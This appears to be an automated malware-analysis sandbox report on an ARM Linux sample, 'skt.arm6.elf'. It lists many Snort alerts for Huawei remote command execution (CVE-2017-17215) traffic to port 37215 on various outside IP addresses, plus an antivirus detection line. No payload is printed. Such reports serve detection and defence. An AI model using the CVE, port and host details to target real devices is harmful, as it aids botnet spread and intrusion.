            SID:2835222
            Source Port:37064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931834
            SID:2835222
            Source Port:54432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.983912
            SID:2829579
            Source Port:35574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.651820
            SID:2835222
            Source Port:40236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.295123
            SID:2835222
            Source Port:45112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.924242
            SID:2835222
            Source Port:58062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735495
            SID:2829579
            Source Port:39426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.971908
            SID:2835222
            Source Port:45536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435706
            SID:2829579
            Source Port:60580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.764071
            SID:2835222
            Source Port:40714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878801
            SID:2835222
            Source Port:52192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.759560
            SID:2835222
            Source Port:43822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771546
            SID:2829579
            Source Port:38094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857152
            SID:2835222
            Source Port:50780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.334498
            SID:2829579
            Source Port:41924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.550664
            SID:2829579
            Source Port:40214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850338
            SID:2829579
            Source Port:56212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310631
            SID:2835222
            Source Port:45644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.284407
            SID:2835222
            Source Port:43254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343078
            SID:2835222
            Source Port:49412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776723
            SID:2829579
            Source Port:57920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842970
            SID:2835222
            Source Port:56376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.804136
            SID:2835222
            Source Port:35346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.814904
            SID:2835222
            Source Port:52224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.962921
            SID:2835222
            Source Port:49584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.877992
            SID:2829579
            Source Port:34502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507396
            SID:2829579
            Source Port:48950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.312958
            SID:2829579
            Source Port:45820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.699157
            SID:2835222
            Source Port:60814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.937018
            SID:2835222
            Source Port:34762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.263502
            SID:2835222
            Source Port:43118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033200
            SID:2835222
            Source Port:56158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804621
            SID:2829579
            Source Port:46426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.913989
            SID:2835222
            Source Port:41412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.736597
            SID:2829579
            Source Port:41510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378211
            SID:2829579
            Source Port:58024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899354
            SID:2835222
            Source Port:47048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260785
            SID:2835222
            Source Port:40152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.394342
            SID:2829579
            Source Port:60964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963436
            SID:2835222
            Source Port:33252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.961190
            SID:2835222
            Source Port:39262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812616
            SID:2829579
            Source Port:40854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.908484
            SID:2829579
            Source Port:42976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857166
            SID:2829579
            Source Port:34862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841424
            SID:2829579
            Source Port:55906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352518
            SID:2835222
            Source Port:43444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756806
            SID:2835222
            Source Port:49546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.675395
            SID:2829579
            Source Port:40798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039714
            SID:2835222
            Source Port:51388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836773
            SID:2835222
            Source Port:37406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.849673
            SID:2835222
            Source Port:52788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.319101
            SID:2829579
            Source Port:55898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.018471
            SID:2835222
            Source Port:33394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.275579
            SID:2835222
            Source Port:56076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.558608
            SID:2835222
            Source Port:35494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744363
            SID:2835222
            Source Port:47428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776504
            SID:2835222
            Source Port:34044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870125
            SID:2835222
            Source Port:44484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969116
            SID:2829579
            Source Port:46678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.996285
            SID:2835222
            Source Port:51322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.783579
            SID:2835222
            Source Port:44772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924458
            SID:2835222
            Source Port:41890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853393
            SID:2829579
            Source Port:41352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.740380
            SID:2835222
            Source Port:56114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.492625
            SID:2829579
            Source Port:51844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728748
            SID:2835222
            Source Port:37816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919282
            SID:2835222
            Source Port:45612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.865903
            SID:2829579
            Source Port:56192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058654
            SID:2829579
            Source Port:52528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926549
            SID:2835222
            Source Port:54316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864397
            SID:2829579
            Source Port:57162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807447
            SID:2829579
            Source Port:49986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868174
            SID:2829579
            Source Port:38936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.311566
            SID:2829579
            Source Port:46300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996243
            SID:2835222
            Source Port:51812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.086380
            SID:2835222
            Source Port:40650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.652537
            SID:2829579
            Source Port:54196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.805625
            SID:2829579
            Source Port:36738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333826
            SID:2829579
            Source Port:46834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.859486
            SID:2835222
            Source Port:44052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748700
            SID:2835222
            Source Port:59924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279723
            SID:2835222
            Source Port:34538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.715750
            SID:2835222
            Source Port:54466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954332
            SID:2835222
            Source Port:56328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.071752
            SID:2829579
            Source Port:32816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956230
            SID:2835222
            Source Port:33610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767397
            SID:2829579
            Source Port:46516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310798
            SID:2835222
            Source Port:52378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.727423
            SID:2829579
            Source Port:36378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026065
            SID:2829579
            Source Port:34650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026509
            SID:2829579
            Source Port:56992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559221
            SID:2829579
            Source Port:40220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777427
            SID:2835222
            Source Port:58238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.999518
            SID:2835222
            Source Port:49734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.068912
            SID:2829579
            Source Port:39696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.957291
            SID:2829579
            Source Port:33650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760243
            SID:2829579
            Source Port:39794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.814455
            SID:2829579
            Source Port:41224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922743
            SID:2829579
            Source Port:46390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865510
            SID:2829579
            Source Port:34112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525729
            SID:2835222
            Source Port:35470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825931
            SID:2829579
            Source Port:59920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.301057
            SID:2829579
            Source Port:43396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519108
            SID:2829579
            Source Port:53312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741907
            SID:2829579
            Source Port:47272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575379
            SID:2835222
            Source Port:57362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.738694
            SID:2835222
            Source Port:50852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.885078
            SID:2829579
            Source Port:50390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.138246
            SID:2829579
            Source Port:47364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.367050
            SID:2835222
            Source Port:44698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808122
            SID:2835222
            Source Port:56380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.732775
            SID:2829579
            Source Port:48650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849734
            SID:2829579
            Source Port:55068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471163
            SID:2829579
            Source Port:50404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893939
            SID:2835222
            Source Port:50360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012079
            SID:2835222
            Source Port:39368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.560322
            SID:2835222
            Source Port:37638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.771372
            SID:2835222
            Source Port:57406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994868
            SID:2829579
            Source Port:53828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033234
            SID:2829579
            Source Port:50550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.848544
            SID:2829579
            Source Port:49868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782753
            SID:2829579
            Source Port:32908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989840
            SID:2835222
            Source Port:45056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.349899
            SID:2835222
            Source Port:51096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.895762
            SID:2835222
            Source Port:50776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.193589
            SID:2835222
            Source Port:56184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853374
            SID:2829579
            Source Port:37742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764648
            SID:2829579
            Source Port:50050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.857819
            SID:2829579
            Source Port:54636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.628357
            SID:2829579
            Source Port:35994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.342516
            SID:2835222
            Source Port:50064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.661822
            SID:2829579
            Source Port:42908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.996656
            SID:2835222
            Source Port:48948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.933111
            SID:2835222
            Source Port:42532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.550534
            SID:2829579
            Source Port:35522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.275644
            SID:2835222
            Source Port:55944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.651847
            SID:2829579
            Source Port:60442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.782107
            SID:2829579
            Source Port:39634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804840
            SID:2835222
            Source Port:53138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.671844
            SID:2835222
            Source Port:38722
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.599634
            SID:2829579
            Source Port:48762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756798
            SID:2835222
            Source Port:41582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881049
            SID:2835222
            Source Port:59394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842937
            SID:2829579
            Source Port:36468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.934913
            SID:2829579
            Source Port:46012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039841
            SID:2835222
            Source Port:42348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.073114
            SID:2835222
            Source Port:57580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772100
            SID:2835222
            Source Port:48638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887641
            SID:2829579
            Source Port:38276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065525
            SID:2829579
            Source Port:42270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872164
            SID:2829579
            Source Port:53366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.010573
            SID:2835222
            Source Port:40644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.316848
            SID:2829579
            Source Port:41026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.394375
            SID:2829579
            Source Port:46220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900908
            SID:2829579
            Source Port:56096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777612
            SID:2829579
            Source Port:58900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812595
            SID:2835222
            Source Port:48448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810693
            SID:2835222
            Source Port:57502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887452
            SID:2835222
            Source Port:51960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.059844
            SID:2835222
            Source Port:44406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.950754
            SID:2829579
            Source Port:44118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919426
            SID:2829579
            Source Port:36746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058195
            SID:2835222
            Source Port:35498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.721000
            SID:2829579
            Source Port:34640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893149
            SID:2829579
            Source Port:38414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.900409
            SID:2835222
            Source Port:57358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778438
            SID:2829579
            Source Port:47236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837573
            SID:2835222
            Source Port:56906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084774
            SID:2835222
            Source Port:45392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.206610
            SID:2835222
            Source Port:50500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848750
            SID:2835222
            Source Port:53936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.762116
            SID:2835222
            Source Port:60544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840545
            SID:2835222
            Source Port:34628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.262197
            SID:2829579
            Source Port:52830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.720916
            SID:2829579
            Source Port:50116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505633
            SID:2835222
            Source Port:49702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: skt.arm6.elfAvira: detected

            Networking

            barindex
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38538 -> 63.252.52.130:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38538 -> 63.252.52.130:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38384 -> 149.158.0.239:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38384 -> 149.158.0.239:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42160 -> 157.242.26.164:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42160 -> 157.242.26.164:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:46146 -> 157.103.231.32:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:46146 -> 157.103.231.32:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53958 -> 157.14.47.189:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53958 -> 157.14.47.189:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:45188 -> 157.71.219.150:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:45188 -> 157.71.219.150:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:43014 -> 157.27.192.134:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:43014 -> 157.27.192.134:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:47222 -> 195.174.185.19:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:47222 -> 195.174.185.19:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:44842 -> 157.169.220.140:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:44842 -> 157.169.220.140:37215
